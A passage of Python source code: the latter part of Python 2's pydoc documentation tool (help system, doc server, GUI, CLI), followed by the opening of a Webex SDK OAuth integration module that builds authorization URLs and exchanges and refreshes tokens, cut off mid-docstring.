thing.__objclass__.__module__, thing.__objclass__.__name__,
thing.__name__)
if inspect.isclass(thing):
return 'class ' + thing.__name__
if inspect.isfunction(thing):
return 'function ' + thing.__name__
if inspect.ismethod(thing):
return 'method ' + thing.__name__
if type(thing) is types.InstanceType:
return 'instance of ' + thing.__class__.__name__
return type(thing).__name__
def locate(path, forceload=0):
"""Locate an object by name or dotted path, importing as necessary."""
parts = [part for part in split(path, '.') if part]
module, n = None, 0
while n < len(parts):
nextmodule = safeimport(join(parts[:n+1], '.'), forceload)
if nextmodule: module, n = nextmodule, n + 1
else: break
if module:
object = module
else:
object = __builtin__
for part in parts[n:]:
try:
object = getattr(object, part)
except AttributeError:
return None
return object
# --------------------------------------- interactive interpreter interface
text = TextDoc()
html = HTMLDoc()
class _OldStyleClass: pass
_OLD_INSTANCE_TYPE = type(_OldStyleClass())
def resolve(thing, forceload=0):
"""Given an object or a path to an object, get the object and its name."""
if isinstance(thing, str):
object = locate(thing, forceload)
if not object:
raise ImportError, 'no Python documentation found for %r' % thing
return object, thing
else:
name = getattr(thing, '__name__', None)
return thing, name if isinstance(name, str) else None
def render_doc(thing, title='Python Library Documentation: %s', forceload=0):
"""Render text documentation, given an object or a path to an object."""
object, name = resolve(thing, forceload)
desc = describe(object)
module = inspect.getmodule(object)
if name and '.' in name:
desc += ' in ' + name[:name.rfind('.')]
elif module and module is not object:
desc += ' in module ' + module.__name__
if type(object) is _OLD_INSTANCE_TYPE:
# If the passed object is an instance of an old-style class,
# document its available methods instead of its value.
object = object.__class__
elif not (inspect.ismodule(object) or
inspect.isclass(object) or
inspect.isroutine(object) or
inspect.isgetsetdescriptor(object) or
inspect.ismemberdescriptor(object) or
isinstance(object, property)):
# If the passed object is a piece of data or an instance,
# document its available methods instead of its value.
object = type(object)
desc += ' object'
return title % desc + '\n\n' + text.document(object, name)
def doc(thing, title='Python Library Documentation: %s', forceload=0):
"""Display text documentation, given an object or a path to an object."""
try:
pager(render_doc(thing, title, forceload))
except (ImportError, ErrorDuringImport), value:
print value
def writedoc(thing, forceload=0):
"""Write HTML documentation to a file in the current directory."""
try:
object, name = resolve(thing, forceload)
page = html.page(describe(object), html.document(object, name))
file = open(name + '.html', 'w')
file.write(page)
file.close()
print 'wrote', name + '.html'
except (ImportError, ErrorDuringImport), value:
print value
def writedocs(dir, pkgpath='', done=None):
"""Write out HTML documentation for all modules in a directory tree."""
if done is None: done = {}
for importer, modname, ispkg in pkgutil.walk_packages([dir], pkgpath):
writedoc(modname)
return
class Helper:
# These dictionaries map a topic name to either an alias, or a tuple
# (label, seealso-items). The "label" is the label of the corresponding
# section in the .rst file under Doc/ and an index into the dictionary
# in pydoc_data/topics.py.
#
# CAUTION: if you change one of these dictionaries, be sure to adapt the
# list of needed labels in Doc/tools/sphinxext/pyspecific.py and
# regenerate the pydoc_data/topics.py file by running
# make pydoc-topics
# in Doc/ and copying the output file into the Lib/ directory.
keywords = {
'and': 'BOOLEAN',
'as': 'with',
'assert': ('assert', ''),
'break': ('break', 'while for'),
'class': ('class', 'CLASSES SPECIALMETHODS'),
'continue': ('continue', 'while for'),
'def': ('function', ''),
'del': ('del', 'BASICMETHODS'),
'elif': 'if',
'else': ('else', 'while for'),
'except': 'try',
'exec': ('exec', ''),
'finally': 'try',
'for': ('for', 'break continue while'),
'from': 'import',
'global': ('global', 'NAMESPACES'),
'if': ('if', 'TRUTHVALUE'),
'import': ('import', 'MODULES'),
'in': ('in', 'SEQUENCEMETHODS2'),
'is': 'COMPARISON',
'lambda': ('lambda', 'FUNCTIONS'),
'not': 'BOOLEAN',
'or': 'BOOLEAN',
'pass': ('pass', ''),
'print': ('print', ''),
'raise': ('raise', 'EXCEPTIONS'),
'return': ('return', 'FUNCTIONS'),
'try': ('try', 'EXCEPTIONS'),
'while': ('while', 'break continue if TRUTHVALUE'),
'with': ('with', 'CONTEXTMANAGERS EXCEPTIONS yield'),
'yield': ('yield', ''),
}
# Either add symbols to this dictionary or to the symbols dictionary
# directly: Whichever is easier. They are merged later.
_symbols_inverse = {
'STRINGS' : ("'", "'''", "r'", "u'", '"""', '"', 'r"', 'u"'),
'OPERATORS' : ('+', '-', '*', '**', '/', '//', '%', '<<', '>>', '&',
'|', '^', '~', '<', '>', '<=', '>=', '==', '!=', '<>'),
'COMPARISON' : ('<', '>', '<=', '>=', '==', '!=', '<>'),
'UNARY' : ('-', '~'),
'AUGMENTEDASSIGNMENT' : ('+=', '-=', '*=', '/=', '%=', '&=', '|=',
'^=', '<<=', '>>=', '**=', '//='),
'BITWISE' : ('<<', '>>', '&', '|', '^', '~'),
'COMPLEX' : ('j', 'J')
}
symbols = {
'%': 'OPERATORS FORMATTING',
'**': 'POWER',
',': 'TUPLES LISTS FUNCTIONS',
'.': 'ATTRIBUTES FLOAT MODULES OBJECTS',
'...': 'ELLIPSIS',
':': 'SLICINGS DICTIONARYLITERALS',
'@': 'def class',
'\\': 'STRINGS',
'_': 'PRIVATENAMES',
'__': 'PRIVATENAMES SPECIALMETHODS',
'`': 'BACKQUOTES',
'(': 'TUPLES FUNCTIONS CALLS',
')': 'TUPLES FUNCTIONS CALLS',
'[': 'LISTS SUBSCRIPTS SLICINGS',
']': 'LISTS SUBSCRIPTS SLICINGS'
}
for topic, symbols_ in _symbols_inverse.iteritems():
for symbol in symbols_:
topics = symbols.get(symbol, topic)
if topic not in topics:
topics = topics + ' ' + topic
symbols[symbol] = topics
topics = {
'TYPES': ('types', 'STRINGS UNICODE NUMBERS SEQUENCES MAPPINGS '
'FUNCTIONS CLASSES MODULES FILES inspect'),
'STRINGS': ('strings', 'str UNICODE SEQUENCES STRINGMETHODS FORMATTING '
'TYPES'),
'STRINGMETHODS': ('string-methods', 'STRINGS FORMATTING'),
'FORMATTING': ('formatstrings', 'OPERATORS'),
'UNICODE': ('strings', 'encodings unicode SEQUENCES STRINGMETHODS '
'FORMATTING TYPES'),
'NUMBERS': ('numbers', 'INTEGER FLOAT COMPLEX TYPES'),
'INTEGER': ('integers', 'int range'),
'FLOAT': ('floating', 'float math'),
'COMPLEX': ('imaginary', 'complex cmath'),
'SEQUENCES': ('typesseq', 'STRINGMETHODS FORMATTING xrange LISTS'),
'MAPPINGS': 'DICTIONARIES',
'FUNCTIONS': ('typesfunctions', 'def TYPES'),
'METHODS': ('typesmethods', 'class def CLASSES TYPES'),
'CODEOBJECTS': ('bltin-code-objects', 'compile FUNCTIONS TYPES'),
'TYPEOBJECTS': ('bltin-type-objects', 'types TYPES'),
'FRAMEOBJECTS': 'TYPES',
'TRACEBACKS': 'TYPES',
'NONE': ('bltin-null-object', ''),
'ELLIPSIS': ('bltin-ellipsis-object', 'SLICINGS'),
'FILES': ('bltin-file-objects', ''),
'SPECIALATTRIBUTES': ('specialattrs', ''),
'CLASSES': ('types', 'class SPECIALMETHODS PRIVATENAMES'),
'MODULES': ('typesmodules', 'import'),
'PACKAGES': 'import',
'EXPRESSIONS': ('operator-summary', 'lambda or and not in is BOOLEAN '
'COMPARISON BITWISE SHIFTING BINARY FORMATTING POWER '
'UNARY ATTRIBUTES SUBSCRIPTS SLICINGS CALLS TUPLES '
'LISTS DICTIONARIES BACKQUOTES'),
'OPERATORS': 'EXPRESSIONS',
'PRECEDENCE': 'EXPRESSIONS',
'OBJECTS': ('objects', 'TYPES'),
'SPECIALMETHODS': ('specialnames', 'BASICMETHODS ATTRIBUTEMETHODS '
'CALLABLEMETHODS SEQUENCEMETHODS1 MAPPINGMETHODS '
'SEQUENCEMETHODS2 NUMBERMETHODS CLASSES'),
'BASICMETHODS': ('customization', 'cmp hash repr str SPECIALMETHODS'),
'ATTRIBUTEMETHODS': ('attribute-access', 'ATTRIBUTES SPECIALMETHODS'),
'CALLABLEMETHODS': ('callable-types', 'CALLS SPECIALMETHODS'),
'SEQUENCEMETHODS1': ('sequence-types', 'SEQUENCES SEQUENCEMETHODS2 '
'SPECIALMETHODS'),
'SEQUENCEMETHODS2': ('sequence-methods', 'SEQUENCES SEQUENCEMETHODS1 '
'SPECIALMETHODS'),
'MAPPINGMETHODS': ('sequence-types', 'MAPPINGS SPECIALMETHODS'),
'NUMBERMETHODS': ('numeric-types', 'NUMBERS AUGMENTEDASSIGNMENT '
'SPECIALMETHODS'),
'EXECUTION': ('execmodel', 'NAMESPACES DYNAMICFEATURES EXCEPTIONS'),
'NAMESPACES': ('naming', 'global ASSIGNMENT DELETION DYNAMICFEATURES'),
'DYNAMICFEATURES': ('dynamic-features', ''),
'SCOPING': 'NAMESPACES',
'FRAMES': 'NAMESPACES',
'EXCEPTIONS': ('exceptions', 'try except finally raise'),
'COERCIONS': ('coercion-rules','CONVERSIONS'),
'CONVERSIONS': ('conversions', 'COERCIONS'),
'IDENTIFIERS': ('identifiers', 'keywords SPECIALIDENTIFIERS'),
'SPECIALIDENTIFIERS': ('id-classes', ''),
'PRIVATENAMES': ('atom-identifiers', ''),
'LITERALS': ('atom-literals', 'STRINGS BACKQUOTES NUMBERS '
'TUPLELITERALS LISTLITERALS DICTIONARYLITERALS'),
'TUPLES': 'SEQUENCES',
'TUPLELITERALS': ('exprlists', 'TUPLES LITERALS'),
'LISTS': ('typesseq-mutable', 'LISTLITERALS'),
'LISTLITERALS': ('lists', 'LISTS LITERALS'),
'DICTIONARIES': ('typesmapping', 'DICTIONARYLITERALS'),
'DICTIONARYLITERALS': ('dict', 'DICTIONARIES LITERALS'),
'BACKQUOTES': ('string-conversions', 'repr str STRINGS LITERALS'),
'ATTRIBUTES': ('attribute-references', 'getattr hasattr setattr '
'ATTRIBUTEMETHODS'),
'SUBSCRIPTS': ('subscriptions', 'SEQUENCEMETHODS1'),
'SLICINGS': ('slicings', 'SEQUENCEMETHODS2'),
'CALLS': ('calls', 'EXPRESSIONS'),
'POWER': ('power', 'EXPRESSIONS'),
'UNARY': ('unary', 'EXPRESSIONS'),
'BINARY': ('binary', 'EXPRESSIONS'),
'SHIFTING': ('shifting', 'EXPRESSIONS'),
'BITWISE': ('bitwise', 'EXPRESSIONS'),
'COMPARISON': ('comparisons', 'EXPRESSIONS BASICMETHODS'),
'BOOLEAN': ('booleans', 'EXPRESSIONS TRUTHVALUE'),
'ASSERTION': 'assert',
'ASSIGNMENT': ('assignment', 'AUGMENTEDASSIGNMENT'),
'AUGMENTEDASSIGNMENT': ('augassign', 'NUMBERMETHODS'),
'DELETION': 'del',
'PRINTING': 'print',
'RETURNING': 'return',
'IMPORTING': 'import',
'CONDITIONAL': 'if',
'LOOPING': ('compound', 'for while break continue'),
'TRUTHVALUE': ('truth', 'if while and or not BASICMETHODS'),
'DEBUGGING': ('debugger', 'pdb'),
'CONTEXTMANAGERS': ('context-managers', 'with'),
}
def __init__(self, input=None, output=None):
self._input = input
self._output = output
input = property(lambda self: self._input or sys.stdin)
output = property(lambda self: self._output or sys.stdout)
def __repr__(self):
if inspect.stack()[1][3] == '?':
self()
return ''
return '<pydoc.Helper instance>'
_GoInteractive = object()
def __call__(self, request=_GoInteractive):
if request is not self._GoInteractive:
self.help(request)
else:
self.intro()
self.interact()
self.output.write('''
You are now leaving help and returning to the Python interpreter.
If you want to ask for help on a particular object directly from the
interpreter, you can type "help(object)". Executing "help('string')"
has the same effect as typing a particular string at the help> prompt.
''')
def interact(self):
self.output.write('\n')
while True:
try:
request = self.getline('help> ')
if not request: break
except (KeyboardInterrupt, EOFError):
break
request = strip(replace(request, '"', '', "'", ''))
if lower(request) in ('q', 'quit'): break
self.help(request)
def getline(self, prompt):
"""Read one line, using raw_input when available."""
if self.input is sys.stdin:
return raw_input(prompt)
else:
self.output.write(prompt)
self.output.flush()
return self.input.readline()
def help(self, request):
if type(request) is type(''):
request = request.strip()
if request == 'help': self.intro()
elif request == 'keywords': self.listkeywords()
elif request == 'symbols': self.listsymbols()
elif request == 'topics': self.listtopics()
elif request == 'modules': self.listmodules()
elif request[:8] == 'modules ':
self.listmodules(split(request)[1])
elif request in self.symbols: self.showsymbol(request)
elif request in self.keywords: self.showtopic(request)
elif request in self.topics: self.showtopic(request)
elif request: doc(request, 'Help on %s:')
elif isinstance(request, Helper): self()
else: doc(request, 'Help on %s:')
self.output.write('\n')
def intro(self):
self.output.write('''
Welcome to Python %s! This is the online help utility.
If this is your first time using Python, you should definitely check out
the tutorial on the Internet at http://docs.python.org/%s/tutorial/.
Enter the name of any module, keyword, or topic to get help on writing
Python programs and using Python modules. To quit this help utility and
return to the interpreter, just type "quit".
To get a list of available modules, keywords, or topics, type "modules",
"keywords", or "topics". Each module also comes with a one-line summary
of what it does; to list the modules whose summaries contain a given word
such as "spam", type "modules spam".
''' % tuple([sys.version[:3]]*2))
def list(self, items, columns=4, width=80):
items = items[:]
items.sort()
colw = width / columns
rows = (len(items) + columns - 1) / columns
for row in range(rows):
for col in range(columns):
i = col * rows + row
if i < len(items):
self.output.write(items[i])
if col < columns - 1:
self.output.write(' ' + ' ' * (colw-1 - len(items[i])))
self.output.write('\n')
def listkeywords(self):
self.output.write('''
Here is a list of the Python keywords. Enter any keyword to get more help.
''')
self.list(self.keywords.keys())
def listsymbols(self):
self.output.write('''
Here is a list of the punctuation symbols which Python assigns special meaning
to. Enter any symbol to get more help.
''')
self.list(self.symbols.keys())
def listtopics(self):
self.output.write('''
Here is a list of available topics. Enter any topic name to get more help.
''')
self.list(self.topics.keys())
def showtopic(self, topic, more_xrefs=''):
try:
import pydoc_data.topics
except ImportError:
self.output.write('''
Sorry, topic and keyword documentation is not available because the
module "pydoc_data.topics" could not be found.
''')
return
target = self.topics.get(topic, self.keywords.get(topic))
if not target:
self.output.write('no documentation found for %s\n' % repr(topic))
return
if type(target) is type(''):
return self.showtopic(target, more_xrefs)
label, xrefs = target
try:
doc = pydoc_data.topics.topics[label]
except KeyError:
self.output.write('no documentation found for %s\n' % repr(topic))
return
pager(strip(doc) + '\n')
if more_xrefs:
xrefs = (xrefs or '') + ' ' + more_xrefs
if xrefs:
import StringIO, formatter
buffer = StringIO.StringIO()
formatter.DumbWriter(buffer).send_flowing_data(
'Related help topics: ' + join(split(xrefs), ', ') + '\n')
self.output.write('\n%s\n' % buffer.getvalue())
def showsymbol(self, symbol):
target = self.symbols[symbol]
topic, _, xrefs = target.partition(' ')
self.showtopic(topic, xrefs)
def listmodules(self, key=''):
if key:
self.output.write('''
Here is a list of matching modules. Enter any module name to get more help.
''')
apropos(key)
else:
self.output.write('''
Please wait a moment while I gather a list of all available modules...
''')
modules = {}
def callback(path, modname, desc, modules=modules):
if modname and modname[-9:] == '.__init__':
modname = modname[:-9] + ' (package)'
if find(modname, '.') < 0:
modules[modname] = 1
def onerror(modname):
callback(None, modname, None)
ModuleScanner().run(callback, onerror=onerror)
self.list(modules.keys())
self.output.write('''
Enter any module name to get more help. Or, type "modules spam" to search
for modules whose descriptions contain the word "spam".
''')
help = Helper()
class Scanner:
"""A generic tree iterator."""
def __init__(self, roots, children, descendp):
self.roots = roots[:]
self.state = []
self.children = children
self.descendp = descendp
def next(self):
if not self.state:
if not self.roots:
return None
root = self.roots.pop(0)
self.state = [(root, self.children(root))]
node, children = self.state[-1]
if not children:
self.state.pop()
return self.next()
child = children.pop(0)
if self.descendp(child):
self.state.append((child, self.children(child)))
return child
class ModuleScanner:
"""An interruptible scanner that searches module synopses."""
def run(self, callback, key=None, completer=None, onerror=None):
if key: key = lower(key)
self.quit = False
seen = {}
for modname in sys.builtin_module_names:
if modname != '__main__':
seen[modname] = 1
if key is None:
callback(None, modname, '')
else:
desc = split(__import__(modname).__doc__ or '', '\n')[0]
if find(lower(modname + ' - ' + desc), key) >= 0:
callback(None, modname, desc)
for importer, modname, ispkg in pkgutil.walk_packages(onerror=onerror):
if self.quit:
break
if key is None:
callback(None, modname, '')
else:
loader = importer.find_module(modname)
if hasattr(loader,'get_source'):
import StringIO
desc = source_synopsis(
StringIO.StringIO(loader.get_source(modname))
) or ''
if hasattr(loader,'get_filename'):
path = loader.get_filename(modname)
else:
path = None
else:
module = loader.load_module(modname)
desc = (module.__doc__ or '').splitlines()[0]
path = getattr(module,'__file__',None)
if find(lower(modname + ' - ' + desc), key) >= 0:
callback(path, modname, desc)
if completer:
completer()
def apropos(key):
"""Print all the one-line module summaries that contain a substring."""
def callback(path, modname, desc):
if modname[-9:] == '.__init__':
modname = modname[:-9] + ' (package)'
print modname, desc and '- ' + desc
def onerror(modname):
pass
with warnings.catch_warnings():
warnings.filterwarnings('ignore') # ignore problems during import
ModuleScanner().run(callback, key, onerror=onerror)
# --------------------------------------------------- web browser interface
def serve(port, callback=None, completer=None):
import BaseHTTPServer, mimetools, select
# Patch up mimetools.Message so it doesn't break if rfc822 is reloaded.
class Message(mimetools.Message):
def __init__(self, fp, seekable=1):
Message = self.__class__
Message.__bases__[0].__bases__[0].__init__(self, fp, seekable)
self.encodingheader = self.getheader('content-transfer-encoding')
self.typeheader = self.getheader('content-type')
self.parsetype()
self.parseplist()
class DocHandler(BaseHTTPServer.BaseHTTPRequestHandler):
def send_document(self, title, contents):
try:
self.send_response(200)
self.send_header('Content-Type', 'text/html')
self.end_headers()
self.wfile.write(html.page(title, contents))
except IOError: pass
def do_GET(self):
path = self.path
if path[-5:] == '.html': path = path[:-5]
if path[:1] == '/': path = path[1:]
if path and path != '.':
try:
obj = locate(path, forceload=1)
except ErrorDuringImport, value:
self.send_document(path, html.escape(str(value)))
return
if obj:
self.send_document(describe(obj), html.document(obj, path))
else:
self.send_document(path,
'no Python documentation found for %s' % repr(path))
else:
heading = html.heading(
'<big><big><strong>Python: Index of Modules</strong></big></big>',
'#ffffff', '#7799ee')
def bltinlink(name):
return '<a href="%s.html">%s</a>' % (name, name)
names = filter(lambda x: x != '__main__',
sys.builtin_module_names)
contents = html.multicolumn(names, bltinlink)
indices = ['<p>' + html.bigsection(
'Built-in Modules', '#ffffff', '#ee77aa', contents)]
seen = {}
for dir in sys.path:
indices.append(html.index(dir, seen))
contents = heading + join(indices) + '''<p align=right>
<font color="#909090" face="helvetica, arial"><strong>
pydoc</strong> by Ka-Ping Yee <ping@lfw.org></font>'''
self.send_document('Index of Modules', contents)
def log_message(self, *args): pass
class DocServer(BaseHTTPServer.HTTPServer):
def __init__(self, port, callback):
host = 'localhost'
self.address = (host, port)
self.url = 'http://%s:%d/' % (host, port)
self.callback = callback
self.base.__init__(self, self.address, self.handler)
def serve_until_quit(self):
import select
self.quit = False
while not self.quit:
rd, wr, ex = select.select([self.socket.fileno()], [], [], 1)
if rd: self.handle_request()
def server_activate(self):
self.base.server_activate(self)
if self.callback: self.callback(self)
DocServer.base = BaseHTTPServer.HTTPServer
DocServer.handler = DocHandler
DocHandler.MessageClass = Message
try:
try:
DocServer(port, callback).serve_until_quit()
except (KeyboardInterrupt, select.error):
pass
finally:
if completer: completer()
# ----------------------------------------------------- graphical interface
def gui():
"""Graphical interface (starts web server and pops up a control window)."""
class GUI:
def __init__(self, window, port=7464):
self.window = window
self.server = None
self.scanner = None
import Tkinter
self.server_frm = Tkinter.Frame(window)
self.title_lbl = Tkinter.Label(self.server_frm,
text='Starting server...\n ')
self.open_btn = Tkinter.Button(self.server_frm,
text='open browser', command=self.open, state='disabled')
self.quit_btn = Tkinter.Button(self.server_frm,
text='quit serving', command=self.quit, state='disabled')
self.search_frm = Tkinter.Frame(window)
self.search_lbl = Tkinter.Label(self.search_frm, text='Search for')
self.search_ent = Tkinter.Entry(self.search_frm)
self.search_ent.bind('<Return>', self.search)
self.stop_btn = Tkinter.Button(self.search_frm,
text='stop', pady=0, command=self.stop, state='disabled')
if sys.platform == 'win32':
# Trying to hide and show this button crashes under Windows.
self.stop_btn.pack(side='right')
self.window.title('pydoc')
self.window.protocol('WM_DELETE_WINDOW', self.quit)
self.title_lbl.pack(side='top', fill='x')
self.open_btn.pack(side='left', fill='x', expand=1)
self.quit_btn.pack(side='right', fill='x', expand=1)
self.server_frm.pack(side='top', fill='x')
self.search_lbl.pack(side='left')
self.search_ent.pack(side='right', fill='x', expand=1)
self.search_frm.pack(side='top', fill='x')
self.search_ent.focus_set()
font = ('helvetica', sys.platform == 'win32' and 8 or 10)
self.result_lst = Tkinter.Listbox(window, font=font, height=6)
self.result_lst.bind('<Button-1>', self.select)
self.result_lst.bind('<Double-Button-1>', self.goto)
self.result_scr = Tkinter.Scrollbar(window,
orient='vertical', command=self.result_lst.yview)
self.result_lst.config(yscrollcommand=self.result_scr.set)
self.result_frm = Tkinter.Frame(window)
self.goto_btn = Tkinter.Button(self.result_frm,
text='go to selected', command=self.goto)
self.hide_btn = Tkinter.Button(self.result_frm,
text='hide results', command=self.hide)
self.goto_btn.pack(side='left', fill='x', expand=1)
self.hide_btn.pack(side='right', fill='x', expand=1)
self.window.update()
self.minwidth = self.window.winfo_width()
self.minheight = self.window.winfo_height()
self.bigminheight = (self.server_frm.winfo_reqheight() +
self.search_frm.winfo_reqheight() +
self.result_lst.winfo_reqheight() +
self.result_frm.winfo_reqheight())
self.bigwidth, self.bigheight = self.minwidth, self.bigminheight
self.expanded = 0
self.window.wm_geometry('%dx%d' % (self.minwidth, self.minheight))
self.window.wm_minsize(self.minwidth, self.minheight)
self.window.tk.willdispatch()
import threading
threading.Thread(
target=serve, args=(port, self.ready, self.quit)).start()
def ready(self, server):
self.server = server
self.title_lbl.config(
text='Python documentation server at\n' + server.url)
self.open_btn.config(state='normal')
self.quit_btn.config(state='normal')
def open(self, event=None, url=None):
url = url or self.server.url
try:
import webbrowser
webbrowser.open(url)
except ImportError: # pre-webbrowser.py compatibility
if sys.platform == 'win32':
os.system('start "%s"' % url)
else:
rc = os.system('netscape -remote "openURL(%s)" &' % url)
if rc: os.system('netscape "%s" &' % url)
def quit(self, event=None):
if self.server:
self.server.quit = 1
self.window.quit()
def search(self, event=None):
key = self.search_ent.get()
self.stop_btn.pack(side='right')
self.stop_btn.config(state='normal')
self.search_lbl.config(text='Searching for "%s"...' % key)
self.search_ent.forget()
self.search_lbl.pack(side='left')
self.result_lst.delete(0, 'end')
self.goto_btn.config(state='disabled')
self.expand()
import threading
if self.scanner:
self.scanner.quit = 1
self.scanner = ModuleScanner()
threading.Thread(target=self.scanner.run,
args=(self.update, key, self.done)).start()
def update(self, path, modname, desc):
if modname[-9:] == '.__init__':
modname = modname[:-9] + ' (package)'
self.result_lst.insert('end',
modname + ' - ' + (desc or '(no description)'))
def stop(self, event=None):
if self.scanner:
self.scanner.quit = 1
self.scanner = None
def done(self):
self.scanner = None
self.search_lbl.config(text='Search for')
self.search_lbl.pack(side='left')
self.search_ent.pack(side='right', fill='x', expand=1)
if sys.platform != 'win32': self.stop_btn.forget()
self.stop_btn.config(state='disabled')
def select(self, event=None):
self.goto_btn.config(state='normal')
def goto(self, event=None):
selection = self.result_lst.curselection()
if selection:
modname = split(self.result_lst.get(selection[0]))[0]
self.open(url=self.server.url + modname + '.html')
def collapse(self):
if not self.expanded: return
self.result_frm.forget()
self.result_scr.forget()
self.result_lst.forget()
self.bigwidth = self.window.winfo_width()
self.bigheight = self.window.winfo_height()
self.window.wm_geometry('%dx%d' % (self.minwidth, self.minheight))
self.window.wm_minsize(self.minwidth, self.minheight)
self.expanded = 0
def expand(self):
if self.expanded: return
self.result_frm.pack(side='bottom', fill='x')
self.result_scr.pack(side='right', fill='y')
self.result_lst.pack(side='top', fill='both', expand=1)
self.window.wm_geometry('%dx%d' % (self.bigwidth, self.bigheight))
self.window.wm_minsize(self.minwidth, self.bigminheight)
self.expanded = 1
def hide(self, event=None):
self.stop()
self.collapse()
import Tkinter
try:
root = Tkinter.Tk()
# Tk will crash if pythonw.exe has an XP .manifest
# file and the root has is not destroyed explicitly.
# If the problem is ever fixed in Tk, the explicit
# destroy can go.
try:
gui = GUI(root)
root.mainloop()
finally:
root.destroy()
except KeyboardInterrupt:
pass
# -------------------------------------------------- command-line interface
def ispath(x):
return isinstance(x, str) and find(x, os.sep) >= 0
def cli():
"""Command-line interface (looks at sys.argv to decide what to do)."""
import getopt
class BadUsage: pass
# Scripts don't get the current directory in their path by default
# unless they are run with the '-m' switch
if '' not in sys.path:
scriptdir = os.path.dirname(sys.argv[0])
if scriptdir in sys.path:
sys.path.remove(scriptdir)
sys.path.insert(0, '.')
try:
opts, args = getopt.getopt(sys.argv[1:], 'gk:p:w')
writing = 0
for opt, val in opts:
if opt == '-g':
gui()
return
if opt == '-k':
apropos(val)
return
if opt == '-p':
try:
port = int(val)
except ValueError:
raise BadUsage
def ready(server):
print 'pydoc server ready at %s' % server.url
def stopped():
print 'pydoc server stopped'
serve(port, ready, stopped)
return
if opt == '-w':
writing = 1
if not args: raise BadUsage
for arg in args:
if ispath(arg) and not os.path.exists(arg):
print 'file %r does not exist' % arg
break
try:
if ispath(arg) and os.path.isfile(arg):
arg = importfile(arg)
if writing:
if ispath(arg) and os.path.isdir(arg):
writedocs(arg)
else:
writedoc(arg)
else:
help.help(arg)
except ErrorDuringImport, value:
print value
except (getopt.error, BadUsage):
cmd = os.path.basename(sys.argv[0])
print """pydoc - the Python documentation tool
%s <name> ...
Show text documentation on something. <name> may be the name of a
Python keyword, topic, function, module, or package, or a dotted
reference to a class or function within a module or module in a
package. If <name> contains a '%s', it is used as the path to a
Python source file to document. If name is 'keywords', 'topics',
or 'modules', a listing of these things is displayed.
%s -k <keyword>
Search for a keyword in the synopsis lines of all available modules.
%s -p <port>
Start an HTTP server on the given port on the local machine.
%s -g
Pop up a graphical interface for finding and serving documentation.
%s -w <name> ...
Write out the HTML documentation for a module to a file in the current
directory. If <name> contains a '%s', it is treated as a filename; if
it names a directory, documentation is written for all the contents.
""" % (cmd, os.sep, cmd, cmd, cmd, cmd, os.sep)
if __name__ == '__main__': cli()
|
__init__.py
|
"""
An OAuth integration
"""
import concurrent.futures
import http.server
import logging
import socketserver
import threading
import urllib.parse
import uuid
import webbrowser
from collections.abc import Callable
from dataclasses import dataclass
from typing import Union, Optional
import requests
from ..rest import dump_response
from ..tokens import Tokens
log = logging.getLogger(__name__)
__all__ = ['Integration']
@dataclass(init=False)
class Integration:
"""
An OAuth integration
"""
#: integration's client id, obtained from developer.webex.com
client_id: str
#: integration's client secret, obtained from developer.webex.com
client_secret: str
#: OAuth scopes of the integration.
scopes: list[str]
#: redirect URL of the integration
redirect_url: str
#: URL of the authorization service; used as part of the URL to start an OAuth flow
auth_service: str
#: base URL of the access token service
token_service: str
def __init__(self, *, client_id: str, client_secret: str, scopes: Union[str, list[str]],
redirect_url: str,
auth_service: str = None,
token_service: str = None):
"""
:param client_id: integration's client id, obtained from developer.webex.com
:param client_secret: integration's client secret, obtained from developer.webex.com
:param scopes: integration's scopes. Can be a list of strings or a string containing a list of space
separated scopes
:param redirect_url: integration's redirect URL
:param auth_service: authorization service to be used in the authorization URL.
Default: 'https://webexapis.com/v1/authorize'
:param token_service: URL of token service to use to obrtain tokens from.
Default: 'https://webexapis.com/v1/access_token'
"""
self.client_id = client_id
self.client_secret = client_secret
if isinstance(scopes, list):
self.scopes = scopes
else:
scopes: str
self.scopes = scopes.split()
self.redirect_url = redirect_url
self.auth_service = auth_service or 'https://webexapis.com/v1/authorize'
self.token_service = token_service or 'https://webexapis.com/v1/access_token'
def auth_url(self, *, state: str) -> str:
"""
Get the URL to start an OAuth flow for the integration
:param state: state in redirect URL
:type state: str
:return: URL to start the OAuth flow
:rtype: str
"""
scopes = self.scopes
if isinstance(scopes, list):
scopes = ' '.join(scopes)
params = {
'client_id': self.client_id,
'response_type': 'code',
'redirect_uri': self.redirect_url,
'scope': scopes,
'state': state
}
full_url = f'{self.auth_service}?{urllib.parse.urlencode(params)}'
return full_url
def tokens_from_code(self, *, code: str) -> Tokens:
"""
Get a new set of tokens from code at end of OAuth flow
:param code: code obtained at end of SAML 2.0 OAuth flow
:type code: str
:return: new tokens
:rtype: Tokens
"""
url = self.token_service
data = {
'grant_type': 'authorization_code',
'client_id': self.client_id,
'client_secret': self.client_secret,
'code': code,
'redirect_uri': self.redirect_url
}
with requests.Session() as session:
response = session.post(url=url, data=data)
dump_response(response, dump_log=log)
response.raise_for_status()
json_data = response.json()
tokens = Tokens.parse_obj(json_data)
tokens.set_expiration()
return tokens
def refresh(self, *, tokens: Tokens):
"""
Try to get a new access token using the refresh token.
:param tokens: Tokens. Access token and expirations get updated in place.
:raise:
:class:`requests.HTTPError`: if request to obtain new access token fails
"""
data = {
'grant_type': 'refresh_token',
'client_id': self.client_id,
'client_secret': self.client_secret,
'refresh_token': tokens.refresh_token
}
try:
url = self.token_service
with requests.Session() as session:
with session.post(url=url, data=data) as response:
dump_response(response=response, dump_log=log)
response.raise_for_status()
json_data = response.json()
except requests.HTTPError:
tokens.access_token = None
raise
else:
new_tokens = Tokens.parse_obj(json_data)
new_tokens: Tokens
new_tokens.set_expiration()
tokens.update(new_tokens)
def validate_tokens(self, *, tokens: Tokens, min_lifetime_seconds: int = 300) -> bool:
"""
Validate tokens
If remaining life time is to small then try to get a new access token
using the existing refresh token.
If no new access token can be obtained using the refresh token then the access token is set to None
and True is returned
:param tokens: current OAuth tokens. Get updated if new tokens are created
:type tokens: Tokens
:param min_lifetime_seconds: minimal remaining lifetime in seconds. Default: 300 seconds
:type min_lifetime_seconds: int
:return: True -> min lifetime reached and tried to get new access token.
:rtype: bool
"""
if tokens.remaining >= min_lifetime_seconds:
return False
log.debug(f'Getting new access token, valid until {tokens.expires_at}, remaining {tokens.remaining}')
try:
self.refresh(tokens=tokens)
except requests.HTTPError:
# ignore HTTPErrors
pass
return True
def get_tokens_from_oauth_flow(self) -> Optional[Tokens]:
"""
Initiate an OAuth flow to obtain new tokens.
start a local webserver on port 6001 o serve the last step in the OAuth flow
:param self: Integration to use for the flow
:type: :class:`wxc_sdk.integration.Integration`
:return: set of new tokens if successful, else None
